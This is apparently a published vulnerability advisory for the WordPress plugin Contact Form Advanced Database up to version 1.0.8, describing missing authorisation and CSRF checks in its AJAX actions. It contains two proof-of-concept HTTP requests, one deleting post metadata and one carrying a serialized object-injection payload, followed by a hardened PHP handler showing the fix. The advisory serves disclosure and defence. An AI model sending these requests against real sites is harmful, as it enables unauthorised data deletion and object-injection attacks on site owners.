WordPress Plugin Vulnerabilities

Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX Calls

Description

The plugin lacks both authorisation and CSRF checks in its delete_cf7_data and export_cf7_data AJAX actions. Because the actions are available to any authenticated user, users with a role as low as subscriber can call them. The delete_cf7_data action would lead to arbitrary metadata deletion, as well as to PHP Object Injection if a suitable gadget chain is present in another plugin, because user data is passed to the maybe_unserialize() function without first being validated.

Proof of Concept

To delete the _edit_lock metadata of the post ID 18:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock


To prove the object injection, we inserted a new class in the plugin file:

# class InjectionPoint{public function __destruct(){die("OBJECT INJECTION");}}

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data[0][id]=1data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=
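The two checks the advisory says are missing, shown in a hardened handler for the delete_cf7_data action. This is an added example, not the plugin's own code; the nonce action name, the required capability and the 'cf7db_' meta-key prefix are assumptions.

```php
<?php
// Hardened handler for the delete_cf7_data AJAX action.
// Added example, not the plugin's own code: the nonce action name,
// the required capability and the 'cf7db_' meta-key prefix are assumptions.

const CF7DB_NONCE_ACTION = 'cf7db_delete_data';  // assumed
const CF7DB_REQUIRED_CAP = 'manage_options';     // assumed

// The admin page's JavaScript must send wp_create_nonce( CF7DB_NONCE_ACTION )
// as the "_ajax_nonce" field; a request without it is rejected below.
function cf7db_delete_cf7_data() {
    // CSRF check: validates $_REQUEST['_ajax_nonce'] against the action
    // and terminates the request on failure. The vulnerable handler had none.
    check_ajax_referer( CF7DB_NONCE_ACTION );

    // Authorisation check: a subscriber is stopped here instead of
    // reaching delete_post_meta().
    if ( ! current_user_can( CF7DB_REQUIRED_CAP ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $rows = ( isset( $_POST['data'] ) && is_array( $_POST['data'] ) )
        ? wp_unslash( $_POST['data'] )
        : array();

    $deleted = 0;
    foreach ( $rows as $row ) {
        $post_id = isset( $row['id'] ) ? absint( $row['id'] ) : 0;
        $key     = isset( $row['key'] ) ? sanitize_key( $row['key'] ) : '';

        // Only meta the plugin itself wrote may be removed; core keys such
        // as _edit_lock (deleted in the advisory's first PoC) never match.
        if ( 0 === $post_id || 0 !== strpos( $key, 'cf7db_' ) ) {
            continue;
        }

        // The user-supplied "val" field is deliberately ignored: handing it
        // to maybe_unserialize() is what opened the object-injection path.
        if ( delete_post_meta( $post_id, $key ) ) {
            $deleted++;
        }
    }

    wp_send_json_success( array( 'deleted' => $deleted ) );
}
add_action( 'wp_ajax_delete_cf7_data', 'cf7db_delete_cf7_data' );
```

With both checks in place, the requests in the proof of concept fail at check_ajax_referer() before any metadata is touched.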

Classification

Type
NO AUTHORISATION

Miscellaneous

Original Researcher
Quentin VILLAIN (3wsec)
Submitter
Quentin VILLAIN (3wsec)
Verified
Yes

Timeline

Publicly Published
2021-11-15
Added
2021-11-15
Last Updated
2022-04-12